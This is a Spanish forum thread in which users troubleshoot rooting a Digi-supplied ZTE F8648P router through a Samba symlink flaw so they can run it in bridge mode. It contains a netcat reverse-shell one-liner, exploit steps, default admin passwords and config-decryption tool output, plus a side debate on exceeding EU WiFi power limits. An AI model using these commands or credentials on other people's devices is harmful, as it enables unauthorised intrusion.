Tu ONT vieja ya no sirve. El router neutro con las credenciales anteriores sí sirve, pero tienes que usar una ONT XGS-PON con el SN del router Zte y eso es muy caro como dices, así que tienes que usar el router Zte como ONT en modo bridge y para eso tienes que conseguir acceso root (por lo que realmente que sepas el PPPoE no es suficiente y hay que seguir el tutorial).

🗨️ 5
ROM64
ROM64
🗨️ 4
EmuAGR
EmuAGR
1
🗨️ 3
ROM64
ROM64
1
🗨️ 2
lhacc
lhacc
🗨️ 1
ROM64
ROM64
alezz

Has probado a pasar la parte de ZTEG a hexadecimal (5A544547) y juntarlo con el otro trozo del serial? Sale una cadena de la misma longitud que la que tienes en el otro router. Igualmente tendrías que comprobar el estado de la ONT, que debería estar en "o3", que es el paso en el que verifica el SN.

De hecho esos estados te deberían servir para ver donde se queda pillado ya que seguramente lo que estás intentando en algún punto no es compatible.

🗨️ 4
ROM64
ROM64
🗨️ 3
alezz
alezz
1
🗨️ 2
ROM64
ROM64
ROM64
ROM64
Emiguerol

Creo que hago algo mal en la primera parte de la guía. Cuando intento entrar en

Escribimos en la barra del explorador \192.168.1.1sambausb1_1_1raizvarsambalib, intro y pegamos con Ctrl+V el fichero test.smb.conf

No me encuentra esa carpeta. ¿Alguien podría ver si hago algo mal?

Entro con el comando cd a la raiz del USB y luego hago ln - s / raiz. Con ls -l veo que crea la carpeta correctamente y luego descargo busybox con wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv7l -O busybox y linkeo ln -s busybox nc, también veo la carpeta nc con ls -l. Después de eso creo el archivo con el comando cat > payload.sh y meto el contenido que se indica. Hago lo mismo con test.smb.config y cambio la parte de la IP.

No sé que hago mal, agradecería algo de ayuda.

🗨️ 4
alezz

Si no te entra en \\192.168.1.1\samba\usb1_1_1\raiz\var\samba\lib es porque el ln no se creo bien, o el USB no está en NTFS, o tienes un firmware que está parcheado.

Comprueba q tienes la V2.0.12P7N3 antes de mirar otra cosa.

🗨️ 3
Emiguerol

Tengo la versión de software V2.0.12P7N3 y el USB lo he formateado con windows en NTFS. Si el procedimiento es como he comentado, hacer el ls dentro de la raiz del USB al que llego con cd, no sé donde está el fallo. ¿Formateo el USB de otra forma?

Gracias por contestar

Emiguerol

Al final he cambiado de USB y se ha solucionado. Ya soy admin. Muchas gracias

🗨️ 1
alezz

Perfect, disfrutalo!

Emiguerol

Hola,

Desde la opción inspeccionar he cambiado a bridge

captura-pantalla-2022-10-30-19-40-22.webp

y he apagado la VLAN en esa misma parte. Luego he quitado el server DHCP y en "enlazado de puerto" he marcado LAN5 par que saque la conexión por el puerto de 10GB

¿Hago algo mal? Me quedo sin internet y de router neutro tengo un Mikrotik con los valores de PPPoE, VLAN20 y DHCP. El Mikrotik me funcionaba con el ONT anterior.

🗨️ 2
Bestiux

Estoy como tu, con el router anterior que tenia la ONT externa si que lo pude hacer pero con este no hay forma. Has conseguido algo, alguien te ha respondido por privado?

esteveli

Para que funcione el puerto de 10G es el Zte el que tiene que taggear la VLAN

esteveli
1

Ayer me instalaron la fibra de 10G en valencia y todo perfecto, me colocaron el famoso Zte de este post.

A día de hoy siguen usando la versión V2.0.12P7N3 del firmware (el técnico se asegura de que actualice y aprovisione) y el tutorial ha funcionado a la primera, el router ya lo tengo liberado, con el modo bridge activado, la contraseña del admin cambiada y el tr069 desactivado.

Alvaro Hervas16

Estoy tratando de realizar los pasos para llegar a la shell root del router, pero no sé qué paso estoy haciendo mal.

He ejecutado los comandos en el siguientes orden y he probado con varios USB:

mount -t NTFS-3G /dev/sde1 /mnt/usb1_1_1/
cd /mnt/usb1_1_1/
ln -s / raiz
wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv7l -O busybox
ln -s busybox nc
touch payload.sh
vi payload.sh
cat payload.sh
touch test.smb.conf
vi test.smb.conf
umount /mnt/usb1_1_1 /
nc -l -p 3339

Llego por samba hasta \\192.168.1.1\samba\usb1_1_1 para copiar el fichero test.smb.conf y llego a \\192.168.1.1\samba\usb1_1_1\raiz\var\samba\lib para pegarlo, pero cuando en \\192.168.1.1 veo el directorio pwd me accede en lugar de conectar a la máquina Linux

¿Qué puedo estar haciendo mal?

Router:

  • Versión de hardware V2.0
  • Versión de software V2.0.12P7N3
  • Versión boot V2.0.12P10N2
🗨️ 10
alezz

Seguramente haya algo dentro del fichero payload.sh que esta mal. Ejemplo si tu Linux es la 192.168.1.100:

rm -f /tmp/f ; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | /mnt/usb1_1_1/nc 192.168.1.100 3339 > /tmp/f
🗨️ 9
Alvaro Hervas16

La IP de mi máquina es 192.168.1.129 y lo que he puesto dentro del fichero es:

rm -f /tmp/f ; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | /mnt/usb1_1_1/nc 192.168.1.129 3339 > /tmp/f
🗨️ 8
alezz

pincha el USB en el Linux y haz un ls -l busybox nc y pega la salida aquí.

El nc -l -p 3339 lo tienes abierto en espera de conexión no?

🗨️ 7
alezz
alezz
🗨️ 4
alezz
alezz
🗨️ 2
alezz
alezz
Pepi
1

Hola,

Me han instalado el Zte y ya he podido hacer los cambios pertinentes para ponerlo en modo bridge. Básicamente cambio de password de admin + region code + desactivar tr069. Consigo conectar vía PPPoE correctamente PERO sólo a través de las interfaces de 1gbps. Si conecto a la de 10g, no se establece la conexión.

Estoy utilizando opnsense y, en el router, utilizo siempre el mismo puerto a 1gbps, ya que tengo configurado correctamente con PPPoE, para eliminar posibles puntos de fallo. En el Zte he configurado el port binding de la nueva WAN en modo bridge (la antigua "INTERNET" la he eliminado) en 2 interfaces (la 1 y la 5). El DHCP lo he desactivado en esas 2 mismas interfaces (es decir, lo he configurado para que en la 1 y en la 5 utilice el DHCP de la WAN, que no existe, en lugar del DHCP local del router (el objetivo es poder conectar al router con DHCP en los otros 3 puertos)). Con todo lo anterior… nada, sólo consigo conectar por PPPoE en la interfaz 1, pero no en la 5.

El técnico hizo la prueba de velocidad en el puerto 5, así que entiendo que no es problema del router.

Por otro lado, intenté conectar el puerto 10g sobre un transceiver Mikrotik S+RJ10 a una Mellanox ConnectX-3 sin éxito. No da link, pero supongo que esto puede ser algún problema de compatibilidad entre el transceiver y la mellanox, así que esto de momento lo dejo al margen, aunque lo comento por si es de ayuda.

Alguna idea? :(

Gracias!

🗨️ 5
Pepi

El problema era que no permite el bridge en el 10g si no tiene la VLAN el bridge. Es decir, he tenido que quitar la VLAN del router neutro y que la meta el propio Zte en el bridge.

Pero esto solo pasa en el puerto 10g

🗨️ 4
lcastillo
1

Coñe…tanto le cuesta a Digi posibilitar el modo bridge en 10G??? Hasta que no ofrezcan esta posibilidad NO me cambio a 10 G.

alezz

Si quieres diagnosticar lo que puede estar pasando deberías activar esa config, bajarte un backup, descifrarlo y mirar las relaciones que crea, a ver si detectas como está relacionando el puerto 1 (DEV.ETH.1) con esa VLAN y aplicar la misma configuracion (con el comando sendcmd) para la LAN 5.

Carlos 2

Buenas,

Yo he montado la configuración como comentas tu, y estoy completamente desesperado porque no consigo conectar via PPPoE.

1) Cambiado password admin + region code + desactivado tr069.

2) Borrada la config de WAN INTERNET y creada una nueva en modo bridge, he probado tanto VLAN como sin VLAN como comentabas.

3) Desactivado DHCP y luego también probado poniéndolo en modo Internet, tanto en la LAN 1 como la 5.

3) Bindeado la nueva WAN al 1 y al 5. Tambien probado solamente a LAN 1 y LAN 5 por separado

4) Probado en 2 routers neutros, un Unifi UDM SE y un Asus RT-AC86U

5) Ya tenía dudas de si mi user y password PPPoE son los correctos. Por lo que he vuelto a probar a crear otra vez la interfaz WAN de Internet de forma temporal con estos datos y ha conectado al momento.

Por asegurar, en las trazas de red con tcpdump he pillado esto (enmascarado por seguridad):

13:30:42.629974 PPPoE [ses 0x17cb] PAP, Auth-Req (0x01), id 1, Peer 2XXXXXXX8@Digi, Name 1234Abcd

…#…

Entiendo que el usuario es 2XXXXXXX8@Digi y la contraseña es 1234Abcd

En los logs tanto del router de Unifi como del Asus veo esto continuamente:

pppd[1287]: Timeout waiting for PADO packets

6) He probado también a modificar la MAC por si acaso pero nada

Se os ocurre que troubleshooting puedo hacer para ver que puede estar pasando?

Mil gracias!

🗨️ 1
Carlos 2

He vuelto a intentarlo y lo que he hecho esta vez distinto es desactivar TR0069 y reiniciar el router antes de crear la interfaz bridge. La he asignado sólo al puerto LAN5 para los 10Gb y he creado el bridge asignado la VLAN 20 en el router de Digi como comentaba Pepi.

No sé si esto ha sido necesario, pero como seguía sin conectar he puesto la MAC de la interfaz que aparecía en el menú de WAN status cuando es el Zte el que está en modo Routing. Para poner un ejemplo, la MAC que aparece en la caja y aparece en la WAN para OMCI acababa en 6E y la que aparecía en la WAN de Internet acababa en 6F. He dicho al router de Unifi que haga MAC clone y he puesto esa MAC.

Creo que lo tengo funcionando sobre IPv4 pero aún estoy viendo si puedo hacerlo funcionar con IPv6 también. Lo he dejado así en la config del router de Unifi:

image.webp

Ahora me da cosa reiniciar el router, por si vuelve a no conectar :D

Carlos 2

Por cierto, alguien sabe cual es el user/password por defecto cuando está en modo Zte (operador 173) y no operador Digi(2009)? He tenido la feliz idea de resetear el router de fábrica estando en este modo y ahora mismo no puedo volver a entrar al router y por supuesto no ha restaurado la configuración de Digi.

🗨️ 7
alezz

Prueba estas dos:

Estan serían las del 173:

user: admin - pass: admin y user: user - pass: username

Y estás las del genérico:

user: admin - pass: Web@0063 y user: user - pass: Web@0763

Confirma si alguna de las combinaciones te ha funcionado, en teoría debería ser la primera. De hecho puede que te funcione solo la pass de user, y que la de admin sea la que pone Digi y la esté leyendo del tagparam.

🗨️ 6
Carlos 2

Un millón de gracias alezz!

He probado las 4 y la única que me ha funcionado ha sido la admin del genérico:

user: admin - pass: Web@0063

🗨️ 5
alezz

Vale voy a añadirlo más claro a la guía, por si a alguien se le ocurre hacer lo mismo :)

Con el otro problema que he leido que tienes no te puedo ayudar porque no tengo un router neutro de sobra para probar, lo que está puesto en la guía es todo feedback de gente que sí lo ha podido hacer. Si consigues hacerlo funcionar y era por algo que crees que faltaba en la guía o no estaba bien explicado coméntalo para que lo añada.

🗨️ 4
Carlos 2
Carlos 2
🗨️ 3
alezz
alezz
🗨️ 2
Carlos 2
Carlos 2
🗨️ 1
Carlos 2
Carlos 2
ROM64
2

Una cosilla (con cuidado, sólo para el que pueda). Si pones la WLAN Global Configuración en EEUU, la potencia de emisión y por ende radio de cobertura se incrementan y mucho.

Además, desaparece el DFS y sus hasta 10 minutos de espera.

Antes necesitaba un repetidor pero ahora llega a tope a toda la casa.

También hay más canales disponibles para usar de los que aparecen normalmente.

Especialmente, si dispones de clientes con WiFi 6 o 6E, Este router es un pepino.

Ya le he sustituido las tarjetas WiFi a varios PC (AX200 o AX210) y "vuelan". Van más rápido que por ethernet de 1 Gb.

Eso sí cuidado con la versión 22H2 en Windows 11 (a la de Windows 10 no le pasa). Estropea las velocidades de transferencia de ficheros grandes por SMB, está reconocido por MS y no saben cuándo habrá solución. O te quedas en W10 o impides que W11 actualice a 22H2.

img-20221121-wa0000.webp
🗨️ 6
Weikis

Si en verdad los CPE en si no son malos. Lo que es castaña de verdad es el software que traen.

Jav9i

las limitaciones de potencia de emisión y el DFS no estan por gusto(sobre todo el DFS), recordar que hace poco multaron a un operador por esto. Y eso de canales adicionales, si aquí no se pueden usar es por qué interfieren con algo. Es muy poco solidario usar esos canales / potencias de emisión.

superllo
2

Si usas frecuencias que no están permitidas aquí en Europa puede que algún día recibas la visita de algún técnico de algún ministerio para decirte que dejes de hacerlo. También puede que nunca te visiten porque no te pillen.

DeJaen

Imagino que poner el WLAN Global Configuración en EEUU, será solo posible destripando y cogiendo el router en modo administación que se comenta aquí, pero no he visto dónde, o cómo se pone, en qué fichero. También si hay manera de hacerlo sin destriparlo… que imagino que no. Yo no tengo, estoy en un residencial rodeado de "pocos" vecinos en una esquina y con parque enfrente, y abrir el modo EEUU creo que el radar a mas de 30 kms de mi casa o vecinos, le afecte mucho.

Igual pasaría con el EasyMesh, que no está abierto en la configuración de usuario…

🗨️ 2
ROM64

Si, sólo es posible en modo administrador.

elcompartidor

probado un h3601 con el router en cuestión. Solo bastó con conectarlo por LAN y se autoconfiguró el amplificador el solito en modo MESH (agente y controlador), no había que hacer nada más.

No sé si por ser de la misma marca (ambos Zte) por el estándar EasyMesh, funcionan de lujo, ni más ni menos.

Nada que ver cuando conecté el h3601 al Zyxel ex3001-t que ponen WiFi 6 para fibra smart que no había manera de echarlo a andar como Dios manda.

ROM64

No estoy usando ninguna frecuencia no permitida. Sólo vivo a 25km del radar meteorológico más cercano y es matemáticamente imposible que pueda interferirlo. Mi router emite con más potencia de la normal y en canales "legales". Eso sí sin DFS. Eso no tiene nada que ver con la solidaridad ¿Cómo va a averiguar nadie que mi router no "mira" el DFS? Eso es imposible averiguarlo ni en la puerta de mi casa. Si vives muy muy cerca de un radar si que podrías interferirlo pero la posibilidad es muy muy remota. Aunque no 0. De ahí que haya puesto "cuidado" en el post.

🗨️ 1
ROM64

Repito. No uso ningún canal ilegal y aunque creo que puede ser interesante discutir sobre ello es mejor dejar este tipo de posts para otro hilo.

No es el tema central de este magnífico hilo de alezz.

🗨️ 1
Pnia

Pues claro que estás haciendo algo ilegal.

En Europa hay una normativa que dice que no hay que emitir a más de XX potencia, y el router cumple la norma, tú le dices que estás en España y no te deja poner más de XX.

¿Qué estás haciendo? Pues decirle que estás en EEUU y entonces el router te deja seleccionar la potencia máxima permitida allí, que es más que la permitida aquí, así que si estás emitiendo a más de la permitida … no se cómo lo llamas tú.

En la autopista se puede ir a 120. Ponte a 180 y cuando te pare la poli dile que no es ilegal porque en Alemania no hay límite y luego nos cuentas el resultado.

SinCracK

Sabeis alguno si existe posibilidad de cambiar el limite de conexiones wifi a un ssid?? Con la domotica tengo mas de 32 dispositivos y me falla por todos laos por esto…

🗨️ 1
alezz

Creo que no vas a poder ampliar ese límite. En su día estuve mirando de ampliar otro límite que tiene el router, el de los DHCP estáticos máximos, y me acabe topando con que la base de datos (la que se maneja con sendcmd) tiene unas definiciones de X numero de entradas en las categorías y está hardcodeado, no hay forma de cambiarlo.

Sí que es verdad que por ejemplo en el caso del DHCP llegué a encontrar en un foro de soporte de otro proveedor a una persona quejándose y los del proveedor este a los días hicieron un update de fw con el valor ese ampliado. No se como de colaborativo sería Digi si les abres incidencia solicitando que lo amplien a 64 o 128.

Shark

Buenas, estoy tratando de acceder mediante el fallo de configuración de samba, pero no me sigue los enlaces simbólicos.

He creado esto en un USB con NTFS 3.1:

root@XL:/mnt/a# ls -l

total 1086

lrwxrwxrwx 1 root root 1 dic 1 22:11 a → /

  • rwxrwxrwx 1 root root 1109128 jul 9 2013 busybox

lrwxrwxrwx 1 root root 7 dic 1 22:31 nc → busybox

lrwxrwxrwx 1 root root 1 dic 1 22:31 raiz → /

drwxrwxrwx 1 root root 0 ago 26 04:25 ztef8648p-main

Pero al seguir cualquiera de los enlaces simbólicos no los sigue. Por ejemplo al seguir raiz o "a" da error de permisos y aunque nc se muestra como que ocupa lo mismo que busybox tampoco me lo permite leer.

He estrenado la fibra hoy con las mismas versiones indicadas en el manual:

Tipo de dispositivo F8648P

Versión de hardware V2.0

Versión de software V2.0.12P7N3

Versión boot V2.0.12P10N2

No se que estaré haciendo mal. He probado con ext3 y ext4 y no los lee. Es como si hubieran corregido la vulnerabilidad de los enlaces simbólicos, pero tengo la misma versión que vosotros.

🗨️ 4
alezz
1

Prueba con otro USB. Alguien comentó que con cierto pendrive no le funcionaba y con otro sí, así que puede tratarse de eso. Y sigue los pasos exactamente como se indica en el manual. Al tener exactamente la misma versión de fw es ilógico que lo hayan parcheado.

🗨️ 3
Shark

Muchas gracias por contestar alezz. Sobre lo de la misma versión de fw, piensa que desconocemos como hacen el aprovisionamiento.

Probaré con más usbs, por ahora van dos.

Molaría un .bin con un volcado binario de un USB pequeño para poder replicarlo exáctamente igual, aunque creo que está bien hecho. La única diferencia entre el manual y lo que yo hago es que no utilizo máquinas virtuales, utilizo un Linux y un windows en dos pcs simultaneamente.

Creo el sistema de ficheros en windows (aunque también he probado en Linux), en Linux hago el "ln -s / raiz", desmonto y en el router se ve el enlace llamado raiz, pero no tengo permisos para utilizarlo. Haciendo pruebas si hago otros enlaces simbólicos tampoco puedo, seguirlos.

Las opciones explicar para el fallo son:

  • En el USB no hay exáctamente lo que tenéis vosotros
  • El samba de mi router tiene "follow symlinks = no"

Intentaré explorar la opción del USB al máximo, pero que tengan el follow symlinks en no ahora mismo tampoco sería un disparate.

Nuevamente, gracias alezz.

🗨️ 2
alezz
1

Al enlace simbólico no te va a dejar entrar pero si se puede atravesar, que es la gracia del fallo.

Desde windows, simplemente con poner \\192.168.1.1\samba\usb1_1_1\raiz\ ya te debería salir el desplegable para autocompletar con el contenido de / del router. Como aclaración, que no se si lo estás intentando así o estás intentando acceder directamente al directorio raiz.

🗨️ 1
Shark
Shark
Usuario Yo 1

Yo estoy detectando una cosa un poco rara que no se a que se debe… Os cuento como tengo el tema puesto.

Router con bridge y VLAN en WAN 10g a un pfsense con LAN 10gb, hasta aqui todo perfecto, otra nic 10 a switch 10g y un equipo conectado por 10g y todo rulando a la perfeccion, el problema viene con la wifi…

He habilitado puertos del router como LAN sin DHCP para meter el router como AP en la red, pues bien, funciona, pero la maxima velocidad que da es de 500… 600… en subida llega a los 960 o asi que seria lo normal, es como si la bajada estuviese capada, entiendo que no de mas de 1gb porque la LAN es de 1gb en ese puerto pero que de 500 o 600 y si restablezco el router de toda la chicha completa?? No se si internamente tiene algo que haga que si el sirve la conexion vaya a toda velocidad y si no es el se vea limitado porque no entiendo la verdad que ocurre.

🗨️ 18
Carlos 2

El tema de 600Mbps bajada y 960 de subida me suena un montón… Me da que no es exactamente tu escenario pero a ver si ayuda a ver cosas en común. Todo esto con el Zte en modo bridge:

Conectaba al puerto 10G del Zte un Unifi UDM SE (tanto en un puerto 2.5G como 10G): 620/960

Conectaba al puerto 10G del Zte un Asus RT-AC86U que su WAN es de 1G: 620/960

Todo esto lo hacía clonando la MAC del Zte tanto en el Asus como en el UDM. De pronto quité esa opción y dejé que cada dispositivo usara su MAC y la cosa cambió. Ahora consigo con el UDM unos 4Gb/2Gb. A estas alturas ya no sé si hay algo raro adicional o si tengo el problema en el UDM que no puede hacer más cuando hace PPPoE. Por supuesto si dejo que el router de Digi haga PPPoE tengo el máximo así que ya o sé de quien es la culpa de esto, pero ese es otro tema.

El tema es que cuando hacía clonado de MAC, se reducía la velocidad a valores muy similares a los que comentas en los dos dispositivos de pruebas… No tengo la menor idea de a que se debe, no sé si habrá alguna clase de throttling por parte de Digi…

vukits

estás haciendo las pruebas contra servidores de internet.

Antes de nada, prueba la velocidad de los enlaces locales: hazlas con Baspeed o con nperf

🗨️ 12
SinCracK

No es eso, el problema es de la wifi, tengo iperf para pruebas en local y los resultados son los que son, de subida va bien de bajada va mal, yo creo que tiene algo que ver con como gestiona el tema al estar en bridge que debe perder aceleracion NAT o algo en wifi y se piense que haga un doble NAT o algo cuando realmente no deberia ser asi

🗨️ 11
alezz

Por los números que estais comentando yo dudo que sea tema de aceleradores.

Este router tiene dos, el NPU y el FFE.

Si el FFE no está activo las velocidades son bajísimas y si el NPU no está activo las velocidades bajan pero al menos por el puerto de 10gbps yo llegaba a tener 1,6gbps de bajada.

Los podeis activar y desactivar a vuestro antojo para hacer pruebas con estos comandos:

/proc/zte/sys/ffe/scripts # cat npu
#! /bin/sh
# usage:npu 0/1 (off/on npu)
echo npu $1 > /proc/zte/sys/ffe/cmd
/proc/zte/sys/ffe/scripts # cat ffe
#! /bin/sh
# usage:ffe 0/1 (off/on ffe)
echo ffe $1 > /proc/zte/sys/ffe/cmd
vukits

¿por qué va a tirar de NAT para pruebas en red local?

estoy confundido

🗨️ 9
SinCracK
SinCracK
🗨️ 8
vukits
vukits
-1
🗨️ 7
SinCracK
SinCracK
🗨️ 6
vukits
vukits
🗨️ 5
SinCracK
SinCracK
🗨️ 4
vukits
vukits
🗨️ 3
SinCracK
SinCracK
🗨️ 2
Gomdux
Gomdux
🗨️ 1
SinCracK
SinCracK
EmuAGR

¿Estás haciendo el PPPoE en el pfSense? Porque parece ser que hay limitaciones en la implementación y no da más de unos 600 Mbps como comentas.

🗨️ 3
SinCracK

Si, lo tengo sobre el pfsense, pero esto tiene sentido para la wifi? Por red si da todo bien… no le encuentro sentido pero bueno a ver si saco un rato y modifico la configuracion poniendo el PPPoE sobre el router

🗨️ 2
EmuAGR

Puede ocurrir que por cable tengas paquetes jumbo (>1500 Bytes) pero por WiFi no. La limitación de pfSense es de "paquetes por segundo".

🗨️ 1
SinCracK
SinCracK
Jdbmame
1

He conseguido cambiar la clave de admin y cuando deseo sacar la opción 2 me sale el siguiente error:

root@debian:~/ztef8648p/supertool# python3 Zte-supertool.py –nousb
Zte F8648P supertool by alezz!
[nousb]: Running in nousb mode
[detect_router]: Checking if default gateway (192.168.1.1) is a Zte F8648P router
[detect_router]: It looks like 192.168.1.1 is a Zte F8648P router
What do you want to do? [1=root shell,2=config decript]
2
Note: You need the admin password for this step. If this is your first time using this tool you probably need to do root shell first to change the admin password.
What is the admin password?
Leptis
[Login]: {"sess_token":"sLOso29bVyQRLjIXivwC2eUU","login_need_refresh":true}
[Download-get]: Registering token pbBpjvzbTsDItKD0glWGC5hr
[Download-post]: Received size 29594 bytes
[Download-post]: Writing to file config.bin…
Traceback (most recent call last):
File "/root/ztef8648p/supertool/Zte-supertool.py", line 85, in <module>
key = composekey(mac,serial)
File "/root/ztef8648p/supertool/functions.py", line 53, in composekey
firstpart = "CDD{}".format(serialp[1])
IndexError: list index out of range

¿Qué hago mal?

🗨️ 1
alezz

Entra como admin al router. Ve a Internet / PON Information y dentro pincha en la tab SN, y dime si en SN el principio de lo que te sale es "ZTEGcdd" o si te sale otra cosa.

Jdbmame

gracias por contestar, lo que sale es lo siguiente ZTEGdoc32xxx

🗨️ 1
alezz

Puedes mirar la etiqueta pegada al router y ver si pone lo mismo o si ahí pone "ZTEGcdd"? Si pone lo mismo actualizo el programa para que contemple cualquier combinación despues de ZTEG

Jdbmame

pone lo mismo, gracias

🗨️ 1
alezz

Vale, tengo claro lo que está pasando. Luego cuando esté en casa actualizo el programa

Jdbmame

muchisimas gracias por el trabajo y la dedicación. un saludo.

🗨️ 1
alezz

Descarga la nueva versión y prueba a ver si ya te funciona y me dices

Jdbmame

ya funciona y no da error, lo que observo que el fichero que crea, config.bin.txt, está vacio

🗨️ 1
alezz

El config.bin sí tiene contenido? Pasame el log borrando la parte donde sale tu numero de serie

Jdbmame

el config.bin tiene contenido pero está encriptado. el log al que te refieres cual es? esto?

Note: You need the admin password for this step. If this is your first time using this tool you probably need to do root shell first to change the admin password.
What is the admin password?
Leptis
[Login]: {"sess_token":"U0MTmgP2sVonbHls8JvIfZT2","login_need_refresh":true}
[Download-get]: Registering token sTz9gWQkOkDjDbO0upIceim0
[Download-post]: Received size 29546 bytes
[Download-post]: Writing to file config.bin…
[Config Key]: D0C32bf9946e8xxxxxxx
[Configdecryptor]: Signature: F86xxx
[Configdecryptor]: Has decrypt payload
[Configdecryptor]: Malformed decrypted payload, likely you used the wrong key!
🗨️ 2
alezz

Vale, creo que sé por que puede ser. En mi router y en otros que he visto todos tenían CDD al principio del serial y luego eran todo números, y veo que en el tuyo salen letras que intuyo que lo mismo tienen que ir en mayusculas, voy a hacer un pequeño retoque y ahora te aviso para que te bajes otra vez el programa y pruebes.

alezz

Vale descargalo y pruebalo y me dices

Jdbmame

ahora si crea el fichero con datos, ahora a averiguar que es cada cosa. muchas gracias

🗨️ 1
alezz

Perfecto, tu serial tenia un formato totalmente nuevo que no había visto antes. Ya con este cambio debería coger cualquier serial.

Por cierto te has dejado una password por ahí en los logs, si es una pass que usas para otras cosas edita los mensajes y quitala.

Jdbmame

si no te preocupes, no está entera.

🗨️ 1
alezz

Perfect :)

Si tienes cualquier duda con algo de la config comentalo por aquí

Jdbmame

hola de nuevo, tengo el siguiente problema, en uno de los pasos de fue la luz eléctrica y cuando intento logearme de nuevo sale el siguiente mensaje

"[Login]: {"lockingTime":-1,"loginErrMsg":"Otro usuario ha iniciado sesión al sistema, por favor intente más tarde…","promptMsg":"","sess_token":"wHZmQyFHfm11qUytrgyZaCGn"}
Traceback (most recent call last):
File "/root/ztef8648p/supertool/Zte-supertool.py", line 60, in <module>
post_token = samba_get(r,host)
File "/root/ztef8648p/supertool/pages.py", line 39, in samba_get
btoken = re.search(r'_sessionTmpToken = "(.*?)";',a.text).group(1)
AttributeError: 'NoneType' object has no attribute 'group'

he reiniciado router y PC y nada, no sé como desconectar el usuario. gracias

🗨️ 3
Jdbmame

ya lo solucioné, he reseteado el router desde el boton y a empezar de nuevo…

alezz

Es por una limitación del router, solo deja tener una sesión abierta con el mismo usuario. Si te pasa otra vez simplemente espera unos minutos o abre la sesión en el navegador (te saldra una pantalla para cerrar otras sesiones) y cierra la sesión. Cuando tenga un rato editaré la función de login para que corte la ejecución nada más que detecte que hay locking time (o cuando se ponga la password mal, que supongo que sale el mismo traceback).

🗨️ 1
Jdbmame

conseguido todo lo que pretendia, ya está en modo brige por el puerto 5 (10gb) y la red la gestiono con mikrotik. gracias por todo.

Carlos 2

Buenas,

Dados los problemas de performance que estoy teniendo con mi router neutro (Unifi UDM SE) cuando pongo el Zte en modo bridge y el UDM se encarga del PPPoE… ¿Sabéis si hay alguna forma de hacer IP pass-through? Es decir, que el Zte se encargue del PPPoE pero que a través del puerto 5 del Zte conectado al WAN del router neutro, el neutro obtenga la IP pública asignada por Digi? Todo esto es por evitar Dual NAT + DMZ.

PD: Tengo la conexión plus contratada para estar fuera de CG-NAT.

Gracias!

🗨️ 16
perian

hola, algún progreso con esto, tengo el UDM SE y tengo el mismo problema.

por cierto, qué transceptor usas, yo he comprado éste: 10Gtek ASF-10G-T.

🗨️ 9
Carlos 2

Nada, el ticket de soporte después de un millón y medio de pruebas y trazas enviadas me lo cerraron con un "Ya lo seguiremos investigando nosotros, se lo hemos escalado al equipo de producto, revisa las notas de los parches por si ves alguna mejora en PPPoE". Así que básicamente lo tengo con doble NAT y me duele en el corazón tenerlo así xD.

El transceptor tenemos el mismo.

🗨️ 8
perian

en este instante lo tengo en DMZ, tengo bien armado el sistema de protección en el UDM, pero la velocidad que logro dista mucho de los 7-8g que mostró el instalador, está en subida en 4,5 y en bajada nunca llega a los 3.

de todos modos con PPPoE me parece que yo lograba mejores datos que tú, tanto en subida como bajada estaba siempre por encima de 1 y a veces lograba estar por encima de 2.

en canadá tienen una opción DMZ Advanced, que parece que les da IP pública, mira aquí community.ui.com/questions/How-setup-Dre…2f848721f1a2 habría estado genial aquí…

perian

he comprado dos transceptores más para probar, por si no negociaran bien la velocidad, uno ya lo recibí, y es lo mismo, además creo que eso es algo chino con diferente marca, el tercero llegará mañana, pero no espero diferencia…

visto lo visto, y como se calientan, vaya cosa qué caliente! podría usar el puerto de ethernet de la WAN que llega a 2,5…

aunque es lo que dices, hemos cambiado a 10g para tenerlo… me gustaría lograr mejor velocidad!

🗨️ 6
Carlos 2
Carlos 2
🗨️ 5
perian
perian
🗨️ 4
Carlos 2
Carlos 2
🗨️ 3
perian
perian
🗨️ 2
EmuAGR
EmuAGR
1
perian

hola carlos, has logrado que tu red detrás del UDM SE tenga IPv6? solo logro que el UDM tenga IPv6, pero no logro que ninguna de las redes detrás del UDM obtenga IPv6, alguna idea? no sé mucho de IPv6 la verdad y según la documentación del UDM parece que el router Zte no permite delegar… muchas gracias de antemano.

Carlos 2

Pues ahora mismo estoy con doble NAT porque UDM y UDM SE no tienen aceleración por hardware y el rendimiento PPPoE es pésimo.

🗨️ 3
perian

Sí, es mi caso, pero con ese módulo en el UDM SE (el UDM no sé si tiene SPF+) podemos lograr lo que queremos, es costoso, pero es una solución.

perian

Y mi problema con el doble NAT es que no he logrado hacer funcionar la delegación de IPv6, el router de Digi no le pasa los datos que se necesita al UDM SE y de manera manual, configurando el UDM SE, no lo he logrado, tampoco tengo suficiente conocimiento supongo…

🗨️ 1
Carlos 2
Carlos 2
PakorroGalvez

Buenas, estoy siguiendo los pasos del nuevo proceso automático, pero se me queda pensando cuando lanzo la opcion 1 de sacar la clave de root. No continua, que puede ocurrir? Estoy usando una máquina virtual de ubuntu con VirtualBox. Os dejo pantallazo por si me podéis guiar para continuar con el proceso. No continua con el proceso, no se si es normal o tarda bastante en ello. Los datos del router son estos:

  • Versión de hardware V2.0
  • Versión de software V2.0.12P7N3
  • Versión boot V2.0.12P10N2
error-ztef8648p.webp
🗨️ 11
alezz

uhm, está fallando al capturar un token que necesita para hacer el post de la página de samba.

Haz lo siguiente, entra a la web del router, a la sección de samba. Abre el modo desarrollador del navegador y busca esta cadena de texto: _sessionTmpToken y pega aquí la línea entera.

pasa también la versión de python y la versión de ubuntu que me temo que va más por ahí la cosa.

🗨️ 9
PakorroGalvez

No se si exactamente es esto lo que quieres, la cadena aparece en muchas ocasiones en el código fuente de la página. pero he buscado el texto "Auto encendido después de detectar un dispositivo de almacenamiento USB conectado" en el servicio de samba y he localizado cerca la var _sessionTmpToken y pone esto:

_sessionTmpToken = "x35x49x43x49x38x34x73x50x79x62x73x6ex41x46x41x41x6cx65x74x75x38x4ex66x6f";
var childPage = $("#childPage");
var FstHeadDIV = $(".HeadDIV", childPage).eq(0);
var collapBarToUnfold = $(".collapBarWithDataTrans",FstHeadDIV).eq(0);
var containerMainID = FstHeadDIV.attr("id") + "_container";
var UnderControlContainer = $("#"+containerMainID, FstHeadDIV);

